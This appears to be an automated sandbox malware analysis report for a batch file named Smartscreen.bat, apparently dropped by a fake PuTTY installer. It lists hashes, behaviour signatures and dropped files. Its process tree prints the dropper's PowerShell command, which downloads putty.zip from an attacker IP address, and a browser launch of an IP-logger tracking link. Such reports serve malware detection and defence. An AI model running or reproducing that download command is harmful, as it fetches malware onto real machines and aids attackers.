Overview

overview

10

Static

static

3

66a5a52938...42.exe

windows7-x64

10

66a5a52938...42.exe

windows10-2004-x64

10

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

$PLUGINSDIR/UAC.dll

windows7-x64

3

$PLUGINSDIR/UAC.dll

windows10-2004-x64

3

$PLUGINSDI...fo.dll

windows7-x64

3

$PLUGINSDI...fo.dll

windows10-2004-x64

3

$PLUGINSDI...gs.dll

windows7-x64

3

$PLUGINSDI...gs.dll

windows10-2004-x64

3

$PLUGINSDI...ec.dll

windows7-x64

3

$PLUGINSDI...ec.dll

windows10-2004-x64

3

$TEMP/putt...en.bat

windows7-x64

10

$TEMP/putt...en.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    144s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    31/05/2024, 19:39

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    $TEMP/putty/Smartscreen.bat

  • Size

    238B

  • MD5

    f6423b02fa9b2de5b162826b26c0dc56

  • SHA1

    01e7e79e6018c629ca11bc30f15a1a3e6988773e

  • SHA256

    59f52a56309ecb5c9c256a88db12a60403e5b0a8c0b8c013e7f6c9c5c395ff83

  • SHA512

    5974e3a1bfe84719a2af614995f821d1c0a751b2ef2b39a3f6087c31dec609eb57d0824a28304e68365b75a0c7a3978aa28ed26c8f392976bd3337c1e8561459

Score
10/10
execution

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://94.103.188.126/jerry/putty.zip

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Modifies Internet Explorer settings 1 TTPs 36 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\$TEMP\putty\Smartscreen.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2188
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object Net.WebClient).DownloadFile('http://94.103.188.126/jerry/putty.zip', 'C:\Users\Admin\AppData\Local\Temp\putty.zip')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2332
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/26uSj6
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2600
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2600 CREDAT:275457 /prefetch:2
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:3020

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize

    914B

    MD5

    e4a68ac854ac5242460afd72481b2a44

    SHA1

    df3c24f9bfd666761b268073fe06d1cc8d4f82a4

    SHA256

    cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

    SHA512

    5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    1KB

    MD5

    a266bb7dcc38a562631361bbf61dd11b

    SHA1

    3b1efd3a66ea28b16697394703a72ca340a05bd5

    SHA256

    df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

    SHA512

    0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC
    Filesize

    252B

    MD5

    003e1973ede9b0ea860afff489e7fa11

    SHA1

    4e05c6e8d36c6d7eca77412937688375d4490a22

    SHA256

    637901593d48e3ee9230e48d8af79e80a202dc69694ebea2c5ae118aec0d934c

    SHA512

    987d47a0eb9d22de9bc263ff74ead040670ff0103e28f7e2c310c5835c54886a55bf31a5fbfd718062844c753ca46165ddcb9169adc61121e149bd36d3ca3f67

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    344B

    MD5

    e211677fd03413299dc36c7f783ec35c

    SHA1

    c5b7647a3eab7e6f748d809228f7ef831ab65bbe

    SHA256

    7ee3b785072774a678e250f0b823ccfba57d93519fc2ab8745accf0fc61443f8

    SHA512

    e81336fdaff4f226cb37df864493d261d8f10c26ecf4d05794a58e6511c69c695d0fa0f86b2bd9c4b23e9bffae8c1fcf5235eb8a316ce448ec13a1c6230a6a0e

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    fe61d12c399da8e93acb37857aa32783

    SHA1

    00a0b381cb052246214b8ac932d7039a1a792e15

    SHA256

    b549a634eb8e590c24f91088ee2c577ccc4c2a9bd27fa597f16e0b91c0d3dea8

    SHA512

    733912377a54ea02bd911e50a00281167586a4b9b406ebf1b1a7960c097b7e72395e81910c6ac3afa081f9ec8b8fb5429f651a2e87daff7abe5cef7704dcf018

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    571886b5be8efaa566e013c3eaadb73c

    SHA1

    9cf3ddd23e2a1d29d89549c51405410c5a9c3272

    SHA256

    90e7d1b3fa72bcb57e83bd9e6f17da4e7499862fb13e4aa7cb0bbf1951f95f8f

    SHA512

    44f648639e02a495cdcb7aa0e55348728e2c2b9a19ec75064722539fe661d709cf9ccbf311fbe02a3260e9f41e13c49e096eccea08eef9129b855bfc8fee0faa

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    0f967863b4160d6bd000f8c5b9824766

    SHA1

    729abb37db5b4954bc8c079c3c606b0a9ebac91e

    SHA256

    81821e8629a946583461e4b1de4d6f70832784cc866219348efd07aa70b6a6b6

    SHA512

    c1720b464d80183b46d29b147df3b88aa97b251fbe033072b7e5f3dd9cb4143a490b6563b792e8c726e987395c71deff4ebb4fc9410575e0fbc95280d77c50f5

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    1774c524b0ad700a0f4d5d49898eb9b2

    SHA1

    b8092676de1258f37e3890a310e3d2c2be2ca8d8

    SHA256

    07309bea8be9588a861b53d5ccf68f6164b0025dae7e343fc2b3cba8118bc209

    SHA512

    2f259b75775c2dfb9cc050df34c30944001141c296adce255a2b53b06de084090df6769bdc6e814d241752049b976738e39918320e7224334c50bb36d1caa535

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    b8bd10823f8104bc70ab9ebbb13118f6

    SHA1

    c4bfab1907e12c7a3b066bf7423cff481fb3a2de

    SHA256

    2ff4d5b15e1e6b7590ce21f7b8a4ee75d96eebb5efe41ba807414ccba67c125e

    SHA512

    a73130c9e428afba611905f56848bb5cd84a098af5f260ea0616e28571a9be481bcbe9503f745d69ada87123e0442ad31e8482e1791f067b016e92351c71bc83

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    b4ca27cac95b83b938255c018163c893

    SHA1

    27055d3f14c6f1f6ee9acaeef31ff1b89ef61588

    SHA256

    746188c8dfed7f6401803d1a48c04c17648f708b7bea00ff07c9f0b126a9af3f

    SHA512

    56683fdbe2f3ef6c492f6d4aaf0ccebc83cde5569852d9393b9eeb7fe5914c436dddc16d3f7c7b6e979f9cfd4ead15e280fe3af571419529b3de12115140698a

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    0854056d2b7469df3e325b127f489fb2

    SHA1

    092d5b0bbc41fdc6f51ea17e673c360d1105125b

    SHA256

    37f46d4c29135c7f0dce47daef47875c6afe9d4381c1f16588812cd721d16ce8

    SHA512

    0a15569dbec4fa3e4d223fd6ee8fef582d189112a5698b8485ff567a76a5618fcf50052b195a54a76990cea30237d8d997b30a5dd0e7a760c67c823bbc18cb7f

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    dd44b571840737846aa0ca371fe5283c

    SHA1

    a6468aedaacdf98abd3ff3978ce1cdd594aeb99a

    SHA256

    132cf797452fde258943cf4e3c0ec6d74666300dff848dd1da5c94d11b7a8e57

    SHA512

    c136f289c3d1f43c29c812a593eb38900fe0ee857035b91a818f63871d87c64057a35854b338091542289b23e416c62d22a96f969cb73c0acbe503c1af80234c

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
    Filesize

    342B

    MD5

    2b4bf8de153fa33bc66937a08aab41d3

    SHA1

    8acbcbe52ff3c65512072c1b1c05bbc6467174a5

    SHA256

    b814bc6ede2a7faf4aa54353edd3698f72f5106163c0aa9bb1002cedade069d8

    SHA512

    61a6499320974450c5309ac3f94c9fb98f13b8c438d76fbd01ed7f42b247a87bcba1d1b348e04704ad5b52c29ba5ac22a51bbb62d110e0d4d56f609f8290fcae

    Download Submit

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
    Filesize

    242B

    MD5

    8a1bba81c9f1579686511c830c3fa277

    SHA1

    3fb1c45258666b05c231b540c55dc474ceb175ed

    SHA256

    67fa194d70938ebbbdd0283cd644ddf5889ba788e8cc56d8ec2a38bc7b0a150d

    SHA512

    bf6ed06fe1cee00d512bd3b1daaa7a0501ee27d6dbfa3df6726a76811f49b11537e80f151755642d4271f7917eb82f6961d345ed69ee4dbc7753d349ada96a95

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\3pl5scb\imagestore.dat
    Filesize

    5KB

    MD5

    c078dc05093c0cf4432ff7a4b45f44bb

    SHA1

    d7df3c5a532c0283f8b67ebb23e85df2a4f6a011

    SHA256

    c0b7681eedd23339e6eefd21f03b09ebec9a0399c5e6312bee43fd3bf0333704

    SHA512

    53f17df4a40bb40d9b5937fea7883ad4ce0aa02c5d909339066f320473528b7f1e38a8c97a7d00ccc59c466dfaf5e6952fe2cec4073d8806ddac8c4e0d32ded9

    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OORQXHVT\favicon[1].ico
    Filesize

    5KB

    MD5

    f3418a443e7d841097c714d69ec4bcb8

    SHA1

    49263695f6b0cdd72f45cf1b775e660fdc36c606

    SHA256

    6da5620880159634213e197fafca1dde0272153be3e4590818533fab8d040770

    SHA512

    82d017c4b7ec8e0c46e8b75da0ca6a52fd8bce7fcf4e556cbdf16b49fc81be9953fe7e25a05f63ecd41c7272e8bb0a9fd9aedf0ac06cb6032330b096b3702563

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Cab9E24.tmp
    Filesize

    65KB

    MD5

    ac05d27423a85adc1622c714f2cb6184

    SHA1

    b0fe2b1abddb97837ea0195be70ab2ff14d43198

    SHA256

    c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

    SHA512

    6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar9E27.tmp
    Filesize

    171KB

    MD5

    9c0c641c06238516f27941aa1166d427

    SHA1

    64cd549fb8cf014fcd9312aa7a5b023847b6c977

    SHA256

    4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

    SHA512

    936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Tar9F46.tmp
    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    Download Submit

  • memory/2332-4-0x000007FEF61AE000-0x000007FEF61AF000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2332-12-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-10-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-9-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-7-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-8-0x000007FEF5EF0000-0x000007FEF688D000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2332-6-0x00000000027E0000-0x00000000027E8000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2332-5-0x000000001B4F0000-0x000000001B7D2000-memory.dmp

    Filesize

    2.9MB

    Download